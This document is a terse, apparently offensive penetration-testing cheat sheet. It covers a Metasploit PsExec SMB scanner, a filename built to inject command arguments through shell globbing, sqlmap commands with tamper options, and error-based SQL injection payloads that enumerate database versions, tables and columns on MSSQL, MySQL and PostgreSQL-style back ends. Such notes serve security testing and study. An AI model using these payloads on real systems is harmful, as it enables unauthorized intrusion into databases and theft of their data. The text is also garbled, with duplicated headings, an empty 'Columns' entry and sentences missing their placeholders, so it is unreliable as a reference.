- PSExec Scanner (Multi-load)
use auxiliary/scanner/smb/psexec_scanner
Create files with weird characters (used for globbing manipulation):
touch -- "--file-with=weird characters"
sqlmap -u <uri> --data "{ \"user\": \"1\"}" --tamper=charunicodeescape --dbms=<type> --technique=<technique>
- Techniques:
- Default - all
- T - time based
- Techniques:
sqlmap -r <file>
- Reads URL, Method, Data/Parameters from file in the format of Network request export (e.g. from BURP).
- Error-based SQLi
- General:
or 1 in (SELECT TOP 1 CAST(query as varchar(4096))) -- -
- Where
is anything like: @@version
calls master..sysdatabases
- Where
- Get tables:
or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM db..sysobjects where xtype='U' and name no in ('','')); -- -
- Where
is the database name and'',''
is an increasing list of known tables starting from blank''
when none are known.
- Where
- Columns:
- Data:
db..table where column not in ('')
- Casting to varchar to trigger errors:
CAST(id as varchar)+char(59)
(urlencode + to %2b if needed)- Output will look like
with char(59) (;
) triggering the varchar type change.
- Output will look like
- General:
- Error-based SQLi
- General:
union select count(*), concat(value, floor(rand(0)*2)) as z from information_schema.tables group by z;
- General:
- Error-base SQLi
- General:
select cast(query as numeric);
(select table_name from information_schema.tables limit 1 offset x)
- offset 0,1,2,etc...
- General: